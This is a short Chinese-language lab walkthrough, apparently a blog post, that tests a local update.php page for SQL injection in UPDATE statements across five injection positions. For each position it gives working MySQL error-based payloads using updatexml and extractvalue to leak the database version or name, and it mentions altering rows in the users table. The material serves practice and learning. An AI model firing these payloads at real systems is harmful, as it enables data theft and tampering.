访问首页的update模块http://127.0.0.1/sql/update.php，开始对update模块进行测试。

update语法：

 UPDATE 【users】 SET 【username】 = 【'haxotron9000'】 WHERE username = 【'1'】 

接收的参数可能拼接到上述语句中【】的任一个位置，4个位置，共有5种不同的类型。下面开始演示：　

一、String in WHERE clause

构造POC：

' or updatexml(1,concat(0x7e,(version()),0x7e),0) or'

如下图，获取数据库版本　　

二、Integer in WHERE Clause

构造POC：

1 or extractvalue(1,concat(0x7e,database())) or''

如下图，获取数据库版本

三、Column Name

注入点在【1】处，

UPDATE users SET 【1】 = 'haxotron9000' WHERE isadmin = 0 

能想到的利用方式有两种：

1、注释掉后面的语句，*构造报错语句进行执行

2、更改users表中的用户数据

POC：

UPDATE users SET id=1 or extractvalue(1,concat(0x7e,database()))

四、Table Name

注入点在【1】处

 UPDATE 【1】 SET username = 'haxotron9000' WHERE isadmin = 0 

我们如何来利用呢？

1、表名可以自己控制，在知道某表某列的情况下，就可以*更改数据啦。

2、构造报错注入，与上一个类似。

五、Value to write

注入点在【1】处

UPDATE users SET username =【 '1'】 WHERE isadmin = 0 

构造POC：

UPDATE users SET username = '1' or extractvalue(1,concat(0x7e,database()))#

似乎没什么新意，也就这几种方法在切换，以后想到别的方法再来更新吧